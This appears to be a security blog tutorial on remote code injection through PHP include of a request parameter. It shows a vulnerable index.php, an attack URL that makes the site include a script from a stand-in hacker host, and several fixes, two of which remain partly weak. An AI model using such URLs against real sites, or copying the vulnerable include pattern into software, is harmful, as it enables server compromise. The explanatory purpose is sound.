Beware of remote code injection exploit in PHP!

PHP makes it convenient to build web pages that share a common header and footer. This is the technique we normally use when building corporate web sites, to maintain the same look and feel across the entire site. The following piece of code (index.php) shows how it is used.

The index.php
<?php
      $page = $_REQUEST['p'].".inc.php";
      include "header.inc.php";
      include $page;   // body content chosen by the request parameter p
      include "footer.inc.php";
?>

In the code above, the body content is determined by the variable $page, which is built from the request parameter $_REQUEST['p']. The value is concatenated with the extension ".inc.php" and the result is then included by the index.php page. This is convenient because the common header and footer are each maintained in one place, in "header.inc.php" and "footer.inc.php".

A common example is seen in most corporate web sites built with PHP: the header page has a menu bar that presents hyperlinks to various pages, such as the home page, contact us, about us, tell a friend, etc. Each of these hyperlinks uses the parameter p to direct the main index.php page to switch to a different body content.

The header.inc.php
<html>
      <head><title>My Index Page</title></head>
      <body>
      <div class="topMenu">
         <span class="menuTab"><a href="index.php?p=home">Home</a></span>
         <span class="menuTab"><a href="index.php?p=tellafren">Tell A Pal</a></span>
         <span class="menuTab"><a href="index.php?p=aboutus">About Us</a></span>
         <span class="menuTab"><a href="index.php?p=contactus">Contact Us</a></span>
      </div>

Although this is a convenient and easy way to maintain a common theme and look and feel across the entire website, it opens up a big vulnerability to hackers. The PHP include function works NOT only for local pages that reside on your web server's hard drive; it can also include a page that resides on a remote web server. If the index.php above takes no extra precautions, such as filtering the input, removing slashes, or accepting only the allowed pages, then a hacker can easily carry out code injection by getting your index.php to include a remote script that resides on the hacker's computer. For example, if your website is www.mywebsite.com and your index.php uses the p parameter to switch between body contents, the hacker will request the following using any web client or browser:

http://www.mywebsite.com/index.php?p=http://hackerssite.com/remoteharmfulscripts

Once the hacker has requested the above URL, your website will include the remote script, which can then do harmful things to your web server, such as downloading a phishing or other hacking script, or executing a phpinfo() command to find out more details of your web server before proceeding with further hacking. (Please note: in this example the hacker puts a script with the file name "remoteharmfulscripts.inc.php" on their remote server, hackerssite.com. The hacker also configures that web server to output "remoteharmfulscripts.inc.php" as plain text, so that the code is injected into your script.)

This kind of hacking has recently become quite common: when hackers find that a website uses this technique and is hackable, they carry out the code injection, commonly using the website to download a phishing script to phish PayPal, Amazon or e-banking accounts. If your site is hosted with a good hosting company, this will be detected, you will be considered to have abused the hosting package, and your site will be suspended until you have fixed your code. If you have your own server, you could end up facing a lawsuit, or be misidentified as the hacker who launched the phishing or hacking script against other websites.

How do we prevent the code injection hacking
To avoid code injection, you'll need to do some extra coding for filtering and checking. Any of the following methods will do:

Solution 1. Use the absolute path of the local pages to be included: concatenate the parent folder with your p parameter to form a complete path, use the file_exists() function to check that the page exists locally, and only then include it in your page. For example, the index.php becomes:

The index.php
<?php
      define('ABPATH', '/home/mywebsite/www/');
      // Using absolute path of local pages
      // Note: the fixed prefix keeps remote URLs out, but p is still
      // unfiltered, so values containing ../ can point outside ABPATH
      $page = ABPATH.$_REQUEST['p'].".inc.php";
      include "header.inc.php";

      // Include the page only if the file exists
      if (file_exists($page))
            include $page;
      else
            echo "The page ain't exists!!!";

      include "footer.inc.php";
?>

Solution 2. Add a check in your script for valid pages, and include only a valid page.

<?php
      $page = $_REQUEST['p'].".inc.php";
      // List of valid pages
      $mypages = array('aboutus.inc.php', 'home.inc.php', 'tellafren.inc.php', 'contactus.inc.php');
      $valid = false;
      // Stop at the end of the list or as soon as a match is found
      for ($i = 0; $i < sizeof($mypages) && !$valid; $i++) {
            // Check if page is valid
            if ($page === $mypages[$i]) {
                  $valid = true;
            }
      }
      if ($valid) include($page);
      if (!$valid) include($mypages[0]); //include the 1st page if not valid
      include "footer.inc.php";
?>

Solution 3. Check for invalid characters, remove them, and put the pages to be included in a subfolder.

<?php
      // Invalid characters
      $invalidChars = array("/", ".", "\\", "\"", ";");
      // Removing invalid characters from the request parameter
      $name = str_replace($invalidChars, "", $_REQUEST['p']);
      // Pages to be included live in a subfolder
      $page = "mypagesFolder/".$name.".inc.php";
      include $page;
      include "footer.inc.php";
?>

Applying any of the above solutions should save your PHP site from being hacked using the code injection technique. Solutions 2 and 3 are taken from TheServerPages.
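
The checks from Solutions 1 and 2 combined into one function, as an added example that is not part of the original post. The name resolve_page(), the temporary pages directory and the sample values of p are assumptions made for illustration.

```php
<?php
// Added example, not from the original post. resolve_page() and the
// temporary directory are hypothetical; the sample inputs are constructed.

// Map request parameter p to a file that is safe to include.
// Returns an absolute path directly inside $baseDir, or null if rejected.
function resolve_page($p, string $baseDir, array $allowed): ?string
{
    // 1. Accept only a plain string that is on the allow-list (Solution 2).
    if (!is_string($p) || !in_array($p, $allowed, true)) {
        return null;
    }
    // 2. Build the path from a fixed local base directory (Solution 1).
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // 3. Resolve symlinks and ".." and require the file to exist in $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . $p . '.inc.php');
    if ($path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed layout: a pages directory holding two of the four pages.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir);
}
file_put_contents($dir . '/home.inc.php', '<p>home</p>');
file_put_contents($dir . '/aboutus.inc.php', '<p>about us</p>');
$allowed = ['home', 'aboutus', 'tellafren', 'contactus'];

// Constructed values of p, including the URL form shown in the article.
$samples = [
    'home',                                         // valid page
    'http://hackerssite.com/remoteharmfulscripts',  // remote URL
    '../aboutus',                                   // path traversal
    ['home'],                                       // p[]=home (array)
    'contactus',                                    // allowed, file missing
];
foreach ($samples as $p) {
    $path = resolve_page($p, $dir, $allowed);
    $shown = json_encode($p, JSON_UNESCAPED_SLASHES);
    printf("%-48s => %s\n", $shown, $path === null ? 'rejected' : basename($path));
}
```

In index.php the returned path would be passed to include, with a null result replaced by a default page. Separately from the code, leaving allow_url_include off in php.ini prevents include from fetching http:// URLs at all.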
